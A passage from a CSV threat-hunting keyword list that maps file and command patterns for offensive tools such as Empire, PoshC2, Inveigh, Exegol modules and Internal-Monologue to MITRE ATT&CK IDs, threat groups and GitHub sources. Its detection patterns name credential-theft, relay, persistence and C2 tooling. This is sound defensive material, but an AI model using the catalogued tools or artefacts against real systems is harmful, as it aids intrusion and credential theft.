hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_roastinthemiddle*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_ruler*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_rusthound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_shadowcoerce*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
+"*install_smartbrute*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_smbmap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_smtp-user-enum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_sprayhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_targetedKerberoast*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_webclientservicescanner*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_windapsearch-go*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*install_winrar_wine32.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*install_winrar_wine64.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*install_zerologon*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*installexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Install-Module ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*install-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*install-persistence-cron*","offensive_tool_keyword","poshc2","keywords from 
poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Install-ServiceBinary*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Install-SSP -Path*.dll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Install-SSP.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Install-SSP.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*interactsh -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C10","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh*.exe","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C9","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh*oast.*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C14","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh-client -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C11","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh-server -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C13","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*Intercepter-NG*","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*--interface * --wpad --lm --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Internal-Monologue.exe*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" +"*InternalMonologueDll*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" +"*InternalMonologueExe*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - 
TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" +"*InternetCrackUrl*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*IntruderPayloads*","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","10","3430","1189","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z" +"*invalid certificate signing key*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*invalid elliptic curve value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation 
Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*-Inveigh *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh Relay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Inveigh.ps1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh.psd1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh.psm1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh.sln*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*inveigh_version*","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh-Cleartext.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-FormInput.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 
machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-Log.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-master*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-net*.zip*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-NTLMv1.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*Inveigh-NTLMv2.txt*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*-InveighRelay *","offensive_tool_keyword","empire","Empire scripts 
